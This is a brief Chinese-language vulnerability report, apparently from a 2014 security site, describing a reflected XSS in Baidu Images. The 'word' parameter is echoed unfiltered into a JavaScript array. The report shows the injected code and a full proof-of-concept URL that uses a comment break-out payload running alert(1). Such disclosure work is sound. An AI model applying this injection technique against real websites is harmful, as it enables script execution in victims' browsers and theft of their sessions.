百度图片反射型XSS下载

来源：黑吧安全网　浏览：462次　时间：2014-07-03

只是一个反射型XSS

对参数word的值在下面这段js代码中的输出没有进行严格的过滤，导致可植入恶意的javascript代码。

var hotWordResult=[];

            try{

        hotWordResult= [

                         /*

            校花代表大会

            */alert(1),/*

            

            */

                                     /*

            国际变性人选美

            */alert(1),/*

            

            */

                                     /*

            宠物刺猬缺牙照

            */alert(1),/*

            

            */

                                     /*

            脸基尼大妈

            */alert(1),/*

            

            */

                                     /*

            河南裤腰带大门

            */alert(1),/*

            

            */

                                     /*

            南京美腿大赛

            */alert(1),/*

            

            */

                                     /*

            吴京谢楠结婚

            */alert(1),/*

            

            */

                                     /*

            神秘的深泉学院

            */alert(1),/*

            

            */

                                     /*

            90后谋女郎

            */alert(1),/*

            

            */

                                     /*

            台湾双胞胎姐妹

            */alert(1),/*

            

            */

                                ];

    }catch(e){}

POC URL：

http://image.baidu.com/i?ct=503316480&z=0&tn=baiduimagedetail&ipn=d&word=*/alert%281%29,/*&step_word=&ie=utf-8&in=29813&cl=2&lm=-1&st=-1&pn=0&rn=1&di=8662042290&ln=31&fr=wenku&&fmq=1400316300811_R&ic=&s=&se=&sme=0&tab=&width=&height=&face=&is=&istype=2&ist=&jit=&objurl=http%3A%2F%2Fvimg1.ws.126.net%2Fimage%2Fsnapshot%2F2010%2F6%2FH%2FP%2FV67GO76HP.jpg#pn0&-1&di8662042290&objURLhttp%3A%2F%2Fvimg1.ws.126.net%2Fimage%2Fsnapshot%2F2010%2F6%2FH%2FP%2FV67GO76HP.jpg&fromURLippr_z2C%24qAzdH3FAzdH3Ffjw6vi_z%26e3Be_z%26e3B8mn_z%26e3Bv54AzdH3Ffjw6viAzd

相关截图：